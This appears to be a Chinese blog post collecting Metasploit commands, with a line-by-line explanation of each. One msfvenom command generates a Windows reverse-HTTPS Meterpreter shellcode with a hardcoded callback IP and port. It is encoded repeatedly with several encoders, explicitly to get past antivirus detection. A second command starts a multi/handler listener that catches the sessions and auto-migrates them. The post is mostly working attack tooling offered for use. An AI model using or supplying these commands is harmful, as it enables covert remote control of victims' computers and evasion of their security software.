首页 > 其他分享 >【MSF系列】命令合集

【MSF系列】命令合集

时间:2024-08-11 21:50:40浏览次数:6  
标签:set 系列 x86 windows raw msfvenom MSF 合集 payload

###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw

好的,这条命令是在使用 msfvenom 工具生成一个 Windows 平台的 Meterpreter 反向 HTTPS shellcode。

以下是该命令的翻译和解释:

翻译和解释:

  1. msfvenom -p windows/meterpreter/reverse_winhttps

    生成一个反向 Meterpreter payload,使用 HTTPS 协议。

  1. LHOST=39.97.167.211 LPORT=6667

    指定反向连接的主机 IP 地址和端口号,LHOST 是本地监听的 IP,LPORT 是本地监听的端口。

  1. --platform windows -a x86

    目标平台是 Windows,体系结构是 x86。

  1. HandLerSSLCert= ./my.pem

    指定 SSL 证书文件 my.pem,用于加密通信。

  1. StagerVerifySSLCert=true

    确保 payload 验证 SSL 证书。

  1. -s 42 --smallest

    使用 42 字节的 stager,生成尽可能小的 payload。

  1. -e x86/shikata_ga_nai -i 9

    使用 shikata_ga_nai 编码器对 payload 进行 9 次编码。

  1. -f raw

    生成原始格式的 payload。

  1. | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw

    将第一个 payload 通过管道传递给第二个 msfvenom 实例,使用 countdown 编码器进行 8 次编码,生成原始格式的 payload。

  1. | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw

    将第二个 payload 通过管道传递给第三个 msfvenom 实例,使用 call4_dword_xor 编码器进行 6 次编码,并排除字节 \x00, \x0a, 和 \x0d。生成原始格式的 payload。

  1. > /home/xskali/kali/Shecodject/output/shellcode.raw

    将最终生成的 shellcode 保存到指定路径 shellcode.raw 文件中。

这个过程利用了多个编码器对 payload 进行编码和混淆,以试图绕过防病毒软件的检测。

###监听
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'

这条命令用于启动 Metasploit Framework 的 msfconsole 并配置一个监听器以接收反向 Meterpreter 连接。

下面是对命令的逐步翻译和解释:

翻译和解释:

  1. msfconsole -q -x

    启动 Metasploit Framework 的 msfconsole-q 参数表示安静模式(即不显示横幅和欢迎信息),-x 允许直接传递一组命令给 msfconsole 执行。

  1. 'use exploit/multi/handler;

    使用 exploit/multi/handler 模块,这是一个通用的处理模块,用于处理反向连接的 payload。

  1. set ExitOnSession false;

    设置 ExitOnSession 选项为 false,这意味着当一个会话被接收到时,msfconsole 不会退出,允许继续接收其他会话。

  1. set PAYLOAD windows/meterpreter/reverse_winhttps;

    设置 payload 类型为 windows/meterpreter/reverse_winhttps,这是一个用于 Windows 的反向 Meterpreter payload,通过 HTTPS 协议进行通信。

  1. set LHOST 192.168.129.128;

    设置 LHOST(本地监听 IP)为 192.168.129.128,这是攻击者机器的 IP 地址,监听来自目标机器的连接。

  1. set LPORT 4445;

    设置 LPORT(本地监听端口)为 4445,这是攻击者机器上监听连接的端口。

  1. set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;

    设置 SSL 证书文件的路径为 /home/xskali/kali/Shecodject/output/my.pem,用于加密通信。

  1. set StagerVerifySSLCert true;

    确保 payload 验证 SSL 证书,这有助于提高安全性。

  1. set SessionCommunicationTimeout 600;

    设置会话通信超时为 600 秒(10 分钟),如果会话在这段时间内没有活动,将会被关闭。

  1. set autorunscript post/windows/manage/migrate;

    设置自动运行脚本为 post/windows/manage/migrate,这个脚本在会话启动后自动运行,通常用于将 Meterpreter 会话迁移到其他进程。

  1. run -j -Z'

    运行处理程序并将其设置为后台作业(-j),同时禁用作业日志输出(-Z)。

整体来说,这条命令会启动 Metasploit 的监听器,并配置了必要的选项来处理反向连接的 Meterpreter 会话,同时应用一些安全和管理设置。

标签:set,系列,x86,windows,raw,msfvenom,MSF,合集,payload
From: https://www.cnblogs.com/o-O-oO/p/18351958

相关文章

  • 【1.0版】【MYSQL安全】sql注入系列:宽字节注入
    主题sql注入系列:宽字节注入原理mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤’的时候,往往利用的思路是将‘转换为\’因此我们在此想办法将‘前面添加的\除掉,一般有......
  • 【1.0版】【MYSQL安全】sql注入系列:堆叠注入
    主题sql注入系列:堆叠注入原理mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行我们发现确实同时执行了,那么在实际中我们引号闭合之后也有可能可以进行堆叠注入,但是堆叠注入和开......
  • 算法题系列5
    题目描述模拟一套简化的序列化传输方式,请实现下面的数据编码与解码过程1.编码前数据格式为[位置,类型,值],多个数据的时候用逗号分隔,位置仅支持数字,不考虑重复等场景;类型仅支持:Integer/String/Compose(Compose的数据类型表示该存储的数据也需要编码)2.编码后数据参考图示,数据......
  • 【1.0版】【MYSQL安全】sql注入系列:基于报错的 SQL 盲注
    主题sql注入:基于报错的SQL盲注一、Floor报错注入1.1floor函数1.2rand函数1.3count(*)1.4floor函数实际利用二、extractvalue函数三、updatexml函数:同extractvalue本来网页是不显示信息的,但是我们可以构造payload让信息通过错误提示回显出......
  • Intel系列微处理器的3种工作模式
    Intel系列微处理器的3种工作模式​微机中常用的Intel系列微处理器的主要发展过程是:8080,8086/8088,80186,80286,80386,80486,Pentium,PentiumⅡ,PentiumlII,Pentium4​8086/8088是一个重要的阶段,8086和8088是略有区别的两个功能相同的CPU。8088被IBM用在了它所生产的......
  • 深入了解HTML链接:从基础到进阶——WEB开发系列06
    超链接是互联网中最有趣的创新之一,自互联网诞生起,它们就一直是互联网的一个核心特性,使网络成为一个互联的系统。超链接允许我们将文档连接到其他文档或资源,甚至是文档中的特定部分。通过一个简单的网址,可以提供应用程序。几乎所有网络内容都可以被转换为链接,点击或激活这些超链......
  • 算法题系列4
    请设计一个文件缓存系统,该文件缓存系统可以指定缓存的最大值(单位为字节)。文件缓存系统有两种操作:存储文件(put)和读取文件(get),操作命令为putfileNamefileSize或者getfileName,存储文件是把文件放入文件缓存系统中;读取文件是从文件缓存系统中访问已存在的文件,如果文件不存在......
  • MSF及Windows渗透测试
    一、MetasploitFramework原理Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合......
  • 【无人机攻击系列】
    反无人机技术与反无人机战略(下)无人机干扰与抗干扰技术详解北航段海滨团队|多智能体强化学习与迁移的无人机集群作战机动决策方法无人机反制:车载侦测干扰一体设备技术详解分布式无人机探测防御系统技术详解【IoT安全】大疆御3无人机研究第2部分:漏洞分析无人机安全通信......
  • 【网络架构系列】内网 DNS 架构之办公网 DNS
    需求分析一、DNS安全性:二、DNS请求转发能力:三、域名管控和审计能力:架构设计架构分析技术建议需求分析办公网DNS不同于业务网DNS,主要承担的是企业或组织机构内部员工的日常办公的域名解析需求,比如:日常的办公系统的访问:OA/ERP/CRM/财务系统/文件共享......